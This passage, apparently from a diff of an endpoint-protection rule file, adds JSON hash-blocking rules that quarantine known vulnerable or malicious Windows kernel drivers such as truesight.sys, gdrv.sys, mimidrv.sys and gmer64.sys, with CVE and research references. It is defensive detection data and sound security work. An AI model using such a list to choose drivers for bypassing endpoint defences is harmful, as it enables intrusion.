"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828130Z", + "creation_date": "2026-03-23T11:45:31.828132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828138Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05ab8bf3a58a99bb1a0b32df46728bc90bc27ca5c7c544db87a285451b3a6814", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51eb126e-d7dd-5d46-9cd5-a3b0e3cc8766", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609521Z", + "creation_date": "2026-03-23T11:45:29.609523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.609529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ede3c99d8a049232cd6baae9d44518a73c19d93230a1d320407a3fc2f506569", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "51f2041c-7a8a-5737-b7c7-81ff80a29566", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476692Z", + "creation_date": "2026-03-23T11:45:31.476696Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6f817b25ae79245b86072bc94445f9770905847274fe42da5982425721024f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52063f46-ec10-59b2-a17e-689557f8a155", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154367Z", + "creation_date": "2026-03-23T11:45:31.154369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154376Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76014259f86bc9d475cee4224a575ef12f3ac36b450243bd95a96bdaa44a6c38", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52081c76-6763-547d-abfb-1c397dc5e058", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620220Z", + "creation_date": "2026-03-23T11:45:29.620222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f", 
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "520bda32-7ae7-53de-91fe-7e2de6e096c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974891Z", + "creation_date": "2026-03-23T11:45:29.974893Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d33fe3bbcdf1ef7e42faf4ac81d7da3a6451eb67b477e78b75506b0df21cf598", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5212743f-a2e0-5408-8f64-fa5abf38315b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971524Z", + "creation_date": "2026-03-23T11:45:29.971526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab1290211250af83be645072d346693890f3f29feda5a3a23ea97758247f7ba1", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5225b412-128d-508d-8c8f-18dc7e803097", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983526Z", + "creation_date": "2026-03-23T11:45:29.983528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bce4a327c9e77631c03057b0e45cdbb2e751194d42995c0310e3ccdd3d33b7c", + "comment": "Vulnerable Kernel Driver (aka KfeCo10X64.sys) [https://www.loldrivers.io/drivers/3e0bf6dc-791b-4170-8c40-427e7299d93d/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5227df82-4230-500e-bbdc-967a6ff44eb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492503Z", + "creation_date": "2026-03-23T11:45:31.492505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e68cc70961503821360b0736a94f0467a459663aedbf6796dad4181aa249a8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "523170c7-5efc-5744-9349-7b2a9becf6b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830221Z", + "creation_date": "2026-03-23T11:45:31.830223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "316e85e43f0045ae7750509fa89e4d48fdb7e47cd531da2256b8a2e6c54e6316", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5237593d-cad5-5f50-abc9-de0dba341973", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465198Z", + "creation_date": "2026-03-23T11:45:30.465202Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85b9d7344bf847349b5d58ebe4d44fd63679a36164505271593ef1076aa163b2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "523b942d-1e72-5ff3-b3d1-53f595f974b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459327Z", + "creation_date": "2026-03-23T11:45:30.459331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26d67d479dafe6b33c980bd1eed0b6d749f43d05d001c5dcaaf5fcddb9b899fe", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "523ed949-7bc9-5147-a3a6-fcd5cae174df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493516Z", + "creation_date": "2026-03-23T11:45:31.493519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493527Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "42274df7bd76ccb91baec7223fbb6c984abccf3c705a134a498305458f52e5a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "523f993f-588a-5540-883f-13cfd924647f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497533Z", + "creation_date": "2026-03-23T11:45:31.497537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497546Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de1bdf123f8b92d6250b02c89267823147ce36f1c0fd4fdca1bb18c2eb17952b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "524844ea-7cc0-58f2-bb74-72cc944c3776", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486473Z", + "creation_date": "2026-03-23T11:45:31.486476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486484Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9d924ecdc0f37c9ebc71429052105e6493024c59b6990a9c6d5bd5846425be5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "524d68d9-8dea-56b9-a6d0-6be41c9bc78b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145679Z", + "creation_date": "2026-03-23T11:45:32.145681Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145687Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16aca71339240826d226f4adbfa73ea7b065f0f2d145d82d6ac2349d2ebba0d2", + "comment": "Malicious Kernel Driver (aka driver_930da474.sys) 
[https://www.loldrivers.io/drivers/4c4e7664-af86-4483-858a-f59346f3d304/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52528de0-a22c-5e68-8ec3-314907fc1416", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824586Z", + "creation_date": "2026-03-23T11:45:30.824589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824597Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee43ea46cb984759b46f88360079e5f4e7f80f6c5b177abff3c57ca3ba96069b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "525cf231-0c78-51dd-8dbc-4f44c0842b15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463699Z", + "creation_date": 
"2026-03-23T11:45:30.463703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "406b844f4b5c82caf26056c67f9815ad8ecf1e6e5b07d446b456e5ff4a1476f9", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52622982-f318-500e-968f-42b35bca81bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826491Z", + "creation_date": "2026-03-23T11:45:31.826493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46c0c7f394a9a400ae7d7cc9de29c7de3d808adbc1d6c5e9f85ff0636871fabc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "527a8fd4-fa9c-5fd9-a1b5-4bbe8629a26a", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818190Z", + "creation_date": "2026-03-23T11:45:30.818192Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1336469ec0711736e742b730d356af23f8139da6038979cfe4de282de1365d3b", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "527be761-bcfe-5978-a2c0-f3326d2ad6ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611566Z", + "creation_date": "2026-03-23T11:45:29.611568Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611574Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fb8f2a0a32f2e73921a16a7836ff14122da45582aae742e6afd4d7ca15b3da3", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "527c2e61-93fb-583d-894b-638566768bef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978756Z", + "creation_date": "2026-03-23T11:45:29.978758Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978763Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0052aa88e42055a2eed5ddd17c3499c692360155e5e031a211edfcef577acce3", + "comment": "Malicious Kernel Driver (aka gmer64.sys) [https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5295bf7a-16eb-5adc-8b5e-cc9facc3f581", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481006Z", + "creation_date": "2026-03-23T11:45:30.481008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbd4f66ae09797fcd1dc943261a526710acc8dd4b24e6f67ed4a1fce8b0ae31c", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5299bd65-8905-53bc-a00e-535c1a5a3674", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818825Z", + "creation_date": "2026-03-23T11:45:30.818827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e190b58266d9f7ce9681b834b0c7e6ab06e1305ab9258d714212a0bad58c0b4", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "529d4d24-ca23-5dc6-855d-b30ea991400a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822318Z", + "creation_date": "2026-03-23T11:45:30.822320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822325Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 